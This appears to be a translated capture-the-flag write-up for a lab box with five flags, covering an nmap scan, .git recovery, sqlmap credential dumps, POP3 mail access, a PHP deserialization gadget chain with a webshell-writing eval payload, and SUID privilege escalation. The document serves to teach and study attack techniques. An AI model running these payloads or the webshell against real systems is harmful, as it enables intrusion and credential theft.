Preface: this is the box I spent the most time on. After the competition I asked my senior classmates and mentors for their writeups and put together this review.

The challenge contains five flags in total.
172.16.160.40

The standard approach is to start with nmap and a directory scan.

nmap returned the following open ports and services:

25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: work.com, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-git:
|   172.16.160.40:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: flag commit
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Gitlab
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
110/tcp  open  pop3     Dovecot pop3d ([XCLIENT])
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA PIPELINING RESP-CODES STLS UIDL AUTH-RESP-CODE TOP SASL(PLAIN) USER
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: Pre-login listed post-login have SASL-IR ENABLE LOGIN-REFERRALS more capabilities LITERAL+ STARTTLS ID IMAP4rev1 IDLE AUTH=PLAINA0001 OK
443/tcp  open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Gitlab
| http-git:
|   172.16.160.40:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: flag commit
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T09:02:14
| Not valid after:  2023-11-18T09:02:14
| MD5:   3c47:9ba9:c35e:d7da:dd8d:92b8:5653:3f9e
|_SHA-1: 67dc:6f7f:f385:fe12:d7a8:9d88:df12:b572:97db:f35a
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Dovecot imapd
|_imap-capabilities: Pre-login post-login have SASL-IR ENABLE LOGIN-REFERRALS more listed capabilities LITERAL+ ID AUTH=PLAINA0001 IDLE IMAP4rev1 OK
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3 Dovecot pop3d ([XCLIENT])
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) AUTH-RESP-CODE TOP RESP-CODES USER PIPELINING
|_ssl-date: TLS randomness does not represent time
3306/tcp open  mysql    MySQL (unauthorized)
9999/tcp open  http     nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: 403 Forbidden

flag1

The scan shows an exposed .git directory, so recover the repository with GitHack. It contains a flag.php that only says "no here", so check the history with git log.

Reset to the commit whose hash starts with 1d to restore that version; flag1 is there.
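The http-git finding above is the kind of exposure a defender wants to catch from the server's own logs, not from an attacker's scan. The following is an added example, not part of the original writeup: it flags clients that were actually served several distinct files under /.git/ (a repository being pulled) and separates them from probes the server already blocked. The access-log lines are constructed samples and the client addresses are documentation IPs.

```python
# Added example (not from the original writeup): detect clients pulling an exposed
# .git directory, the misconfiguration nmap's http-git script reported above.
# The log lines below are constructed samples in Apache "combined" format.
import re
from collections import defaultdict

SAMPLE_LOG = """\
192.0.2.10 - - [03/Feb/2025:18:01:02 +0800] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.77 - - [03/Feb/2025:18:01:05 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
192.0.2.77 - - [03/Feb/2025:18:01:05 +0800] "GET /.git/config HTTP/1.1" 200 137 "-" "python-requests/2.31"
192.0.2.77 - - [03/Feb/2025:18:01:06 +0800] "GET /.git/index HTTP/1.1" 200 1820 "-" "python-requests/2.31"
192.0.2.77 - - [03/Feb/2025:18:01:06 +0800] "GET /.git/objects/1d/2f3a4b HTTP/1.1" 200 412 "-" "python-requests/2.31"
192.0.2.77 - - [03/Feb/2025:18:01:07 +0800] "GET /.git/objects/9e/8d7c6b HTTP/1.1" 200 390 "-" "python-requests/2.31"
198.51.100.5 - - [03/Feb/2025:18:02:00 +0800] "GET /.git/HEAD HTTP/1.1" 403 199 "-" "curl/8.4.0"
"""

# Client IP, request line and status code from the combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def git_hits(log_text: str) -> dict:
    """Return {client_ip: {status_code: [paths]}} for every request into /.git/."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if "/.git/" in m["path"] or m["path"].endswith("/.git"):
            hits[m["ip"]][int(m["status"])].append(m["path"])
    return {ip: dict(codes) for ip, codes in hits.items()}

def exposed_repo_dumps(log_text: str, min_served: int = 3) -> list:
    """Clients that were *served* (2xx) several distinct .git files: a repository
    dump in progress, not a single probe. A 403 means the server blocked the path,
    which is what a correct 'deny .git' rule in the web server config produces."""
    result = []
    for ip, codes in git_hits(log_text).items():
        served = {p for status, paths in codes.items() if 200 <= status < 300 for p in paths}
        if len(served) >= min_served:
            result.append(ip)
    return sorted(result)
```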

flag2

Port 443 is the hint here: a common trick in these challenges is editing the hosts file. Port 9999 cannot be reached directly by IP, but the front-end page source gives a hostname:

gitlab.example.com

Add it to the hosts file.

A directory scan of the front end turns up /login.html, which can be bypassed directly; running sqlmap against it dumps the database:

+----+-------+--------+---------+----------------------------------+
| id | icon  | name   | address | password                         |
+----+-------+--------+---------+----------------------------------+
| 1  | 1.jpg | admin  | 123123  | 64e39c60d69afe351b48472307add2c5 |
+----+-------+--------+---------+----------------------------------+

[13:44:35] [INFO] table 'mail.`admin`' dumped to CSV file 'C:\Users\0raN9e\AppData\Local\sqlmap\output\172.16.160.40\dump\mail\admin.csv'
[13:44:35] [INFO] fetching columns for table 'user' in database 'mail'
[13:44:35] [INFO] retrieved:
[13:44:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
5
[13:44:37] [INFO] retrieved: id
[13:44:43] [INFO] retrieved: username
[13:45:06] [INFO] retrieved: email
[13:45:19] [INFO] retrieved: login_time
[13:45:56] [INFO] retrieved: password
[13:46:24] [INFO] fetching entries for table 'user' in database 'mail'
[13:46:24] [INFO] fetching number of entries for table 'user' in database 'mail'
[13:46:24] [INFO] retrieved: 1
[13:46:25] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
ryan@work
[13:46:56] [INFO] retrieved: 1
[13:46:58] [INFO] retrieved: 2019-08-07 13:00:00
[13:48:04] [INFO] retrieved: circumstances
[13:48:39] [INFO] retrieved: ryan
Database: mail
Table: user
[1 entry]
+----+-----------+---------------+----------+---------------------+
| id | email     | password      | username | login_time          |
+----+-----------+---------------+----------+---------------------+
| 1  | ryan@work | circumstances | ryan     | 2019-08-07 13:00:00 |
+----+-----------+---------------+----------+---------------------+

Reset ryan's mailbox.

Connect with nc and log in as ryan/circumstances; there is a mail waiting.

It spells out exactly what was changed, as a reminder. Then at gitlab.example.com:9999/root/web/-/blob/main/user.php, flag2 is hidden in a comment at the very bottom.

flag3

Sensitive POP3 mail: information is hidden inside the message.

└─$ nc 172.16.160.40 110
+OK [XCLIENT] Dovecot ready.
user ryan
+OK
pass circumstances
+OK Logged in.
list
+OK 1 messages:
1 1633
.
retr 1
+OK 1633 octets
Return-Path: <Amanda@work.com>
X-Original-To: ryan@work.com
Delivered-To: ryan@work.com
Received: from LAPTOP-N2NBA1RK (LAPTOP-N2NBA1RK [192.168.31.58])
        by work.com (Postfix) with ESMTP id 28B1C21E2F35
        for <ryan@work.com>; Mon,  3 Feb 2025 18:08:58 +0800 (CST)
Date: Mon, 3 Feb 2025 10:08:58 +0800
From: "Amanda@work.com" <Amanda@work.com>
To: ryan <ryan@work.com>
Subject: flag
X-Priority: 3
X-Has-Attach: no
X-Mailer: Foxmail 7.2.23.121[cn]
Mime-Version: 1.0
Message-ID: <202502031008578820300@work.com>
Content-Type: multipart/alternative;
        boundary="----=_001_NextPart335171644650_=----"

This is a multi-part message in MIME format.

------=_001_NextPart335171644650_=----
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: base64

ZmxhZzN7dmxnZThyZnEwYmFxYjZzNGduMjd5NWs5cnd1cjk5YjZ9DQoNCg0KDQpBbWFuZGFAd29y
ay5jb20NCg==

------=_001_NextPart335171644650_=----
Content-Type: text/html;
        charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html><head><meta http-equiv=3D"content-type" content=3D"text/html; charse=
t=3Dus-ascii"><style>body { line-height: 1.5; }body { font-size: 14px; fon=
t-family: "Microsoft YaHei UI"; color: rgb(0, 0, 0); line-height: 1.5; }</=
style></head><body>=0A<div><span></span>flag3{vlge8rfq0baqb6s4gn27y5k9rwur=
99b6}</div>=0A<div><br></div><hr style=3D"WIDTH: 210px; HEIGHT: 1px" color=
=3D"#b5c4df" size=3D"1" align=3D"left">=0A<div><span><div style=3D"MARGIN:=
 10px; FONT-FAMILY: verdana; FONT-SIZE: 10pt"><div>Amanda@work.com</div></=
div></span></div>=0A</body></html>
------=_001_NextPart335171644650_=------

flag3 is hidden in the POP3 mail.
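The message above arrives in raw MIME form: the same text is carried twice, once base64-encoded and once quoted-printable, and neither encoding hides anything from whoever can read the mailbox. As an added example (not part of the original writeup), the following Python decodes both parts with the standard library and checks they agree; the embedded message is a constructed, trimmed copy of the one shown (headers shortened, HTML cut down).

```python
# Added example (not from the original writeup): decode the multipart/alternative
# message retrieved over POP3 above. RAW_MESSAGE is a constructed, trimmed copy.
import email
import re
from email import policy

RAW_MESSAGE = b"""\
From: "Amanda@work.com" <Amanda@work.com>
To: ryan <ryan@work.com>
Subject: flag
Mime-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_001_NextPart335171644650_=----"

This is a multi-part message in MIME format.

------=_001_NextPart335171644650_=----
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: base64

ZmxhZzN7dmxnZThyZnEwYmFxYjZzNGduMjd5NWs5cnd1cjk5YjZ9DQoNCg0KDQpBbWFuZGFAd29y
ay5jb20NCg==

------=_001_NextPart335171644650_=----
Content-Type: text/html;
        charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html><body><div>flag3{vlge8rfq0baqb6s4gn27y5k9rwur=
99b6}</div><hr color=3D"#b5c4df"><div>Amanda@work.com</div></body></html>
------=_001_NextPart335171644650_=------
"""

FLAG_RE = re.compile(r"flag\d\{[0-9a-z]+\}")

def decode_parts(raw: bytes) -> dict:
    """Return {content_type: decoded text} for each leaf part. get_content()
    undoes the part's Content-Transfer-Encoding (base64 or quoted-printable,
    including the '=' soft line breaks) and applies its charset."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return {part.get_content_type(): part.get_content()
            for part in msg.walk() if not part.is_multipart()}

def find_flags(raw: bytes) -> dict:
    """Flag-shaped strings found in each decoded part, keyed by content type."""
    return {ctype: FLAG_RE.findall(text) for ctype, text in decode_parts(raw).items()}
```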

flag4

Two approaches were circulating.

Approach 1

The directory scan finds pass.php under /assets/scripts/, which gives a shell directly.

Search with grep -r -n flag to locate flag4.

Approach 2

The earlier directory scan found /backup/www.zip, which contains sqlhelper.php with the following content:

<?php
class sqlhelper{
    private $mysqli;
    private static $host="127.0.0.1";
    private static $user="root";
    private static $pwd="******";
    private static $db="mail";
    public function __construct()
    {
        $this->mysqli = new mysqli(self::$host,self::$user,self::$pwd,self::$db);
        if($this->mysqli->connect_error){
            die("链接失败".$this->mysqli->connect_error);
        }
        $this->mysqli->query("set names utf8");
    }
    // Runs a query and returns the raw result; the SQL string is used as given.
    public function execute_dql($sql){
        $res=$this->mysqli->query($sql);
        return $res;
    }
    // Runs a modifying statement: 0 on error, 1 if rows changed, 2 if none did.
    public function execute_dml($sql){
        $res=$this->mysqli->query($sql);
        if(!$res){
            return 0;
        }else{
            if($this->mysqli->affected_rows>0){
                return 1;
            }else{
                return 2;
            }
        }
    }
    public function close_sql(){
        $this->mysqli->close();
    }
}

if (isset($_POST['un']) && isset($_GET['x'])){
    // Gadget chain, one magic method at a time:
    // allstart::__destruct -> func1::test1 -> func2::__call -> func3::__invoke
    // -> func4::__toString -> toget::get_flag -> eval
    class allstart
    {
        public $var1;
        public $var2;

        public function __construct()
        {
            $this->var1=new func1();
        }

        // Fires when the unserialized object is freed.
        public function __destruct()
        {
            $this->var1->test1();
        }
    }
    class func1
    {
        public $var1;
        public $var2;

        public function __construct()
        {
            $this->var1=new func2();
        }

        // func2 has no test2(), so this lands in func2::__call.
        public function test1()
        {
            $this->var1->test2();
        }
    }
    class func2
    {
        public $var1;
        public $var2;

        public function __construct()
        {
            $this->var1=new func3();
        }

        // Calling $s1 as a function triggers func3::__invoke.
        public function __call($test2,$arr)
        {
            $s1 = $this->var1;
            $s1();
        }
    }
    class func3
    {
        public $var1;
        public $var2;

        public function __construct()
        {
            $this->var1=new func4();
        }

        // String concatenation forces func4::__toString.
        public function __invoke()
        {
            $this->var2 = "concat string".$this->var1;
        }
    }
    class func4
    {
        public $str1;
        public $str2;

        public function __construct()
        {
            $this->str1=new toget();
        }

        public function __toString()
        {
            $this->str1->get_flag();
            return "1";
        }
    }
    class toget
    {
        public $todo;
        public function __construct()
        {
            $this->todo="system('ls');";
        }
        // Sink: whatever is in $todo is evaluated as PHP.
        public function get_flag()
        {
            eval($this->todo);
        }
    }

    unserialize($_POST['un']);
}
?>

Simply instantiating allstart triggers the chain. Change

 $this->todo="system('ls');";

so that it writes a webshell instead:

"file_put_contents('/var/www/html/1.php','<?php eval(\$_POST[1]);');";

From there the approach is the same as above.

flag5

Privilege escalation.

You can use

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

There is a del.py under /tmp; modifying that file is the path to root.

The flag is in aim.jpg under /root.